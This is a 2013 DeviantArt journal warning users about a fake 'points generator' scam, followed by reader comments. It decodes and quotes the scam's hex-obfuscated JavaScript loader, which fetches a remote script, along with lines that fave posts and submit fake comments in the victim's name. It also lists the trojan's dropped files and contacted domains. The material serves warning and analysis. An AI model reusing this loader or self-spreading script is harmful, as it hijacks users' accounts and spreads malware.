Shop Mobile More Submit  Join Login

Update April, 29: All spam accounts from last weekend have been deleted by DA staff.



But new spam accounts have been opened. Please report them to the Help Desk and/or leave a comment here or on petersong's page.

Copied from here:
petersong.deviantart.com/art/S…



Before you do anything stupid, please read this

Obviously, this offer is swindling.
And as such it is dangerous for you !

table of contents


  • What it does
  • And then what ?
  • What can we do ?
  • "I installed it, but I'm okay"
  • "OMG my brother did it !"
  • Updates


  • What it does


    "\x61" is just another way to write "a" (ISO hexadecimal encoding)

    Thus,

    ["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]

    is just written words. Script actually.

    You can have it safely translated by using the "unescape" Javascript function, on this part of the script only.

    Once translated, this script does one thing : it includes a bigger, more elaborated script as being part of the DA page.

    This script can be found here :
    deviantart.hp.af.cm/generator/…

    This script will now be able to act in your name

    Note that this script is NOT hosted by deviantart.com website. It is a foreign website, hosted in Cameroon (Africa), in such a way that the smugglers can't be found by regular simple investigations. They are hiding, and hiding well.

    This new script does something else.
    For now (but it might change) :

    document.getElementById("gmi-ResourceViewFaveButton").click();
    It simulates click on the "Fave" button.

    document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
    It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".

    setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);
    It programs something that will hide this actions by reopening the comment area once it is posted.

    document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();
    It validates the comment (in you name).

    window.top.location.href='deviantart.hp.af.cm/generator';
    alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')

    It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed"

    And then what ?


    And then you wont get any DA points, indeed. I bet you guessed yet…

    Instead, they will say to you "Oh, you don't have this so great plugin, come and download it !", launch the download anyway. And this is where you get screwed if you are gullible enough to run an executable file from a random site hidden in Cameroon…
    I don't know (yet) what this exe file does. But I know what it could do.
    First of it might be (and probably is) a security breach on your computer. Trojan, virus, remote agent…
    Which in turn could be aimed at several things : spreading this publication so that other get screwed, stealing personal information (such as payment card numbers), using your computer as a proxy for networks attacks…

    If you already downloaded the file, please, be very careful. Use antiviral detection and malware removal on your computer now, and in a few days. Firewall protection is a must have.
    The malware might steal your "cookie" too. This means that your password might be compromised. Actually not only for deviantArt.

    What can we do ?


    For now, we can try to warn and inform people.
    Try to make them stop spreading this stupid hoax.
    If you have any idea of what more to do, please, comment.

    "I installed it, but I'm okay"


    Are you so very sure of this ? FYI, virustotal.com ran a virus detection on the exe file using 45 antivirus and states that only 3 of the 45 antivirus he tested found a threat.
    Report can be found here : see the virustotal report
    Now, do as you want.

    "OMG my brother did it !"


    I did not download/run that exe file, am I safe ?


    As far as I know
    • There was no harmful code in the JavaScript stuff that I saw, but it can change at any time
    • Any reasonable browser should not be able to execute a downloaded file without warning you before (and the "plugin" stuff is AFAIK only fake div displayed as part of the internet webpage, then not harmful)
    • I think that the only thing really endangered by the JavaScript is your session cookie, then changing you password might be wise.
    • I have heard of other more sophisticated attacks like buffer overflowing and stuff, but I'm not competent enough to tell you if there is such a threat. Then consider you are not safe until someone can tell us whether there is such a potential threat.

    Thus I would say that as far as I know, you should be relatively safe, but I also know that this is a huge field and that I'm no pro. So you should consider being careful, and having antiviral + firewall protection up to date on your computer (as everyone else).

    Connected Viruses/Malware/Adware identified


    One or several of these malwares might have been dropped on you computer if you had this exe file run on your computer :
    • Trojan
      • Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
      • Identified by Fortinet as MSIL/Agent.HG!tr.spy
      • Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
      • Identified by many other malware detectors as Trojan.GenericKD.966175
      • This is a serious threat
      • This is a Trojan, which means it is a malicious software spying your computer and sending (or giving access to) this data to malicious people. See the Internet Holy Bible for reference.
      • Some antivirus are free. See the Mighty Source of all Truth for reference.
      • Fresh news here thanks to ~krisiskiller101 investigations !
        • He was able to get rid of it using MalwareBYTES
        • He confirmed that RASMan service was up on his computer. Though, this service is not supposed to be harmful and might have been up before. It might also be part of the trojan attack that was not turned back up by the fix because it is not harmful alone.
        • Thanks for the info !
    • AdWare.iBryte.H
      • seems to be a recent version of wellknown adware iBryte
      • Only comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
      • Be very careful as searching for "iBryte.H removal" can lead to spywareprotectiontool.com which is a malicious website giving you malware instead of solutions
      • You can find instructions for this adware removal, searching for "iBryte removal", but I don't know if they would work with this version of the adware (please, tell us if you have any success with one of these procedure)
    • Optimum Installer (fs)


    Personal investigations


    I don't have a packed solution. And I won't probably have time enough to investigate thoroughly this stuff.
    Yet, I found some hints, by diving modestly into this sh*t. I share it for people that it might help.
    This program does the following :
    • It mess up your registry in a theatrical way
      • It probably affects the download manager associated with your web browser
      • It probably affects the toolbars in your web browser
      • Writes 'test' everywhere in the registry
      • Mess up with your ie cache
    • Creates files
      • Create an executable file named "D2M-Precheck.exe", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
      • Create an executable file named "check_offer_rp.dll", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
      • Create copies of these two files in a subdirectory of "C:\Document and settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
    • Runs the created exe file, which in turn spoils your computer :
      • Creates a new "exe" file named "Impressioner.exe" along with a "System.Data.SQLite.dll" and "imp.dat" files, hidden at the same place : "C:\Document and settings\Your_User_Name\Local Settings\Temp"
    • Transfers data through internet with following addresses
      • imp.oi-imp1.com
      • config.oi-config1.com
      • d1uc4fr8hoy8ts.cloudfront.net
      • cdn.install.oibundles2.com (the only thing done here is downloading the dll file stated before)
      • cache-download.real.com
      • d2m.adk-mobile.com
      • app-bucks.com
      • app-caster.com
      • ns20.real.com
      • ns30.real.com
      • ns40.real.com
      • ns-01.cloudfront.net
      • ns-02.cloudfront.net
      • nsgtm01.ak-networks.com
      • nsgtm02.ak-networks.com
      • nsgtm03.ak-networks.com
      • scenic-screensavers.com
      • ns7.markmonitor.com
      • ns6.markmonitor.com
      • ns2.markmonitor.com
      • ns4.markmonitor.com
      • ns5.markmonitor.com
      • ns3.markmonitor.com
      • ns1.markmonitor.com
    • Probably displays advertising


    Be careful : this is not an exhaustive list. And all that is listed above is not necessarily harmful (e.g. SQLite.dll is just a database they use, not a virus itself, probably). Do not edit your Registry if you don't know exactly what you are doing.
    Moreover, I have no idea on what this "impressioner.exe" does. Then there might be a lot more mess to clean. By the way, if you were infected and are able to find this file, please, consider sending a copy of it to me.
    -edit- Okay, it will be hard to find this file on your drive : this file "does something" (including turning up RASMAN Service) and deletes itself. This is really not comforting.

    This said, and with no guarantee of any kind, "do it at your own risks" and stuff, I think that you can safely delete the exe and dll files mentioned above. It might get you rid of part of the infection.

    If you have more information or if you can teach me something on this kind of investigations, please, contact me, I will update.
    This information might even be wrong depending on your OS and configuration !


    Updates


    • There is at least 2 scripts, now : mix.js and nr.js (second one only fav without leaving a comment)
    • There is at least two messages spreading this sh*t
    • It seems I was totally wrong thinking that infected people were spreading those messages. It is more probably bots registering and posting every x seconds





    Thank for reading.
Update: The spam accounts have been deleted.




Currently there is a massive and dangerous spam bot running in DA galleries. If you look for newest deviations you will see countless new deviations with the same content every few seconds.


DON'T DO WHAT'S BEEN SUGGESTED IN THE TEXT OF THE SPAM POST!!!



It installs a trojan or a virus on your computer and of course you WON'T get the promised 20.000 points for free. I copied the article from ~PetersonG [link]


PLEASE FAV AND SHARE


to warn the community about this troll who is operating from three accounts at the moment. You don't have to report these accounts because this has been done numerous times by now. Thank you!

Add a Comment:
 
:iconsimoncaneplz:
SimonCaneplz Featured By Owner 4 days ago  New member
Im pretty sure its rare i think.
Reply
:iconproject-scary0pasta:
Project-SCARY0PASTA Featured By Owner Apr 10, 2015  New member Student Digital Artist
Don't know who this is / was.... but hopefully it's gone. I read this thing and was really angry that someone would do that.... there are many bad people in the world, and that bot / person is one of them. Thank you for posting this, and have a great day / night.... I appreciate you posting this.
Reply
:icongiratinaa:
giratinaa Featured By Owner Aug 31, 2013  Hobbyist General Artist

what about the "dapointsgenerator" on youtube??

:icontonysimon:

Reply
:iconlilyas:
Lilyas Featured By Owner Sep 2, 2013  Professional General Artist
I don't know. What's about it?
Reply
:icongiratinaa:
giratinaa Featured By Owner Sep 2, 2013  Hobbyist General Artist
oh, is it another virus?
Reply
:icongraphicsgail:
GraphicsGail Featured By Owner Jun 28, 2013
A few weeks ago I was about to do it and realized it was too good to be true so it was a scam.
Reply
:iconkaylafoxeh:
KaylaFoxeh Featured By Owner Jun 28, 2013  Hobbyist Digital Artist
This is nuts! All this virus talk reminds me of the chain virus attack I had once... Uggggggh it wasnt pretty. It was so bad, I even had intusive advertising without being connected to the internet because that can contain a virus attack.. disconnecting from the internet and stuff. Took me 3 days to contain and deatroy it all. But this.. takes the cake. It is really terrifying
Reply
:iconthedreaminghawk:
TheDreamingHawk Featured By Owner Jun 23, 2013
They returned AGAIN. I can't get why most spambots come from barren areas. (Like panama and cameroon). I wish DA could install a "Are you human?" Thing where you are forced to choose yes or no to make them stop.
Reply
:iconmama-malamute:
Mama-Malamute Featured By Owner Jun 20, 2013  Hobbyist Digital Artist
Theyre back...
Reply
:iconpoochie10502:
poochie10502 Featured By Owner May 24, 2013  Hobbyist Digital Artist
Reply
:iconcustardandpie:
CustardAndPie Featured By Owner May 16, 2013  Hobbyist Digital Artist
[link]

They're back. . . . and I managed to catch FOUR IN A ROW yet again.
Reply
:iconlilyas:
Lilyas Featured By Owner May 16, 2013  Professional General Artist
DA filters became quite fast lately. It seems they are gone already - for now.
Reply
:iconcustardandpie:
CustardAndPie Featured By Owner May 17, 2013  Hobbyist Digital Artist
Let's hope the scammers go out. . . and STAY out.
Reply
:iconcannonstar17:
cannonstar17 Featured By Owner May 16, 2013  Student Artist
New account spam account alert!: ~burntinstant [link]
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 13, 2013  Hobbyist General Artist
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 13, 2013  Hobbyist General Artist
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 13, 2013  Hobbyist General Artist
Reply
:iconlilyas:
Lilyas Featured By Owner May 13, 2013  Professional General Artist
Aww, look, it's gone already. :hug:
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 13, 2013  Hobbyist General Artist
Oh :w00t: !
Reply
:icondshere:
Dshere Featured By Owner May 11, 2013
nevermind, just answered my own question, he's using appfog still which at his link shows a page telling you to install "VIO flash player!" and the page itself insists that it is a "DA points generator"

Reported his link to Appfog myself, it'll be a dead link when they get to it.
Reply
:icondshere:
Dshere Featured By Owner May 11, 2013
I've been away, anyone notice if it is still using appfog to shorten a URL?
Appfog has antispam policy and will delete the link the spammer uses, you just need to flag them to the link he uses.
Reply
:iconxxjmxpxx:
xxJMXPxx Featured By Owner May 11, 2013  Hobbyist Digital Artist
The spambots are now 'dedicating' (I think) their works to a specific member in DA. I checked the names put in there and they are real DA members... hopefully, they wouldn't fall for it because of their wrong grammar.
Reply
:iconlilyas:
Lilyas Featured By Owner May 11, 2013  Professional General Artist
Basically it has nothing to do with the members their names they use in the title. They just needed to find a new routine to bypass DA's filter.
Reply
:iconxxjmxpxx:
xxJMXPxx Featured By Owner May 11, 2013  Hobbyist Digital Artist
oh...ok ^^
Reply
:iconsugarislife28:
sugarislife28 Featured By Owner May 10, 2013  Hobbyist Digital Artist
another one again [link]
Reply
:iconlilyas:
Lilyas Featured By Owner May 10, 2013  Professional General Artist
Just keep on reporting. They are gone soon....
Reply
:iconsugarislife28:
sugarislife28 Featured By Owner May 10, 2013  Hobbyist Digital Artist
ok
Reply
:iconpa-admin:
PA-Admin Featured By Owner May 10, 2013
Another one - [link]
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 9, 2013  Hobbyist General Artist
Got more at it again! D=

[link] and [link]

I swear at this rate, DA should NOT let new accounts be created until they can find a better way to stop/avoid these.
Reply
:iconred-warrioress:
Red-Warrioress Featured By Owner May 9, 2013  Hobbyist Digital Artist
New one
:iconaquaticwiseop:
Just to let you know :I
Reply
:iconxredmemory:
xReDMemory Featured By Owner May 9, 2013
I don't get how it benefits these people who create bots to spam this.
Reply
:iconlilyas:
Lilyas Featured By Owner May 9, 2013  Professional General Artist
They lure you to scam pages where they steal your data or make you buy stuff whatsoever...
Reply
:iconxredmemory:
xReDMemory Featured By Owner May 9, 2013
I see.
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 3, 2013  Hobbyist General Artist
Ugh, got 2 taken care of just to see another one pop up! D= [link]
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 2, 2013  Hobbyist General Artist
And another one. >.< [link]
Reply
:iconlilyas:
Lilyas Featured By Owner May 2, 2013  Professional General Artist
They are banned quickly meanwhile. DA has learned....
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 3, 2013  Hobbyist General Artist
Not fast enough. :shrug:
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 2, 2013  Hobbyist General Artist
Here is another account doing this >> [link]
Reply
:iconmilovanf:
milovanf Featured By Owner May 3, 2013  Professional Digital Artist
Banned! At last DA has learn his lesson. Now we all have to do is learn the DA admins to take an actions on art thief's no matter that reports have been posted by fans instead of owners...:roll:
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 3, 2013  Hobbyist General Artist
* lol lets THEM be lazier.

Apologies, I am tired. Been a busy day.
Reply
:iconmilovanf:
milovanf Featured By Owner May 3, 2013  Professional Digital Artist
It's fine.
Reply
:icondrache-lehre:
Drache-Lehre Featured By Owner May 3, 2013  Hobbyist General Artist
Ugh I don't think that will ever change to being the way it was. Makes it harder for the rest of us and lets me be lazier.
Reply
:iconmilovanf:
milovanf Featured By Owner May 3, 2013  Professional Digital Artist
I'm lazy too. I don't even pay attention on what I'm writing when I'm talking to someone. :XD:
Reply
:iconkibawhitewarrior:
KibaWhiteWarrior Featured By Owner May 2, 2013  Student Digital Artist
My friend lost her account to this. Don't do it </3
Reply
:iconmrento:
mrento Featured By Owner May 2, 2013
I reported another incarnation of this from about 30 minutes ago, this one using a server in Grenada (.gd)
Reply
:iconqueen-soulia:
Queen-Soulia Featured By Owner May 1, 2013  Hobbyist General Artist
an now it is back :
[link]
Reply
:iconlilyas:
Lilyas Featured By Owner May 1, 2013  Professional General Artist
Naaaah..... Gone......
Reply
:iconqueen-soulia:
Queen-Soulia Featured By Owner May 1, 2013  Hobbyist General Artist
it is back an announces a contest like all the other give away contests but say you have to visit a link. Many young members will fall for this one.. again
Reply
:iconlilyas:
Lilyas Featured By Owner May 1, 2013  Professional General Artist
Damn!
Reply
:iconwikipediauser:
WIKIPEDIAUSER Featured By Owner May 1, 2013  Student Artist
Thanks you So Much Comrade :salute:
Reply
Add a Comment:
 
×

:iconlilyas: More from Lilyas


Featured in Collections

Contests and events by Eitvys200

Journals by moulinrougegirl77


More from DeviantArt



Details

Submitted on
April 28, 2013
File Size
13.3 KB
Link
Thumb

Stats

Views
6,062 (5 today)
Favourites
130 (who?)
Comments
123
×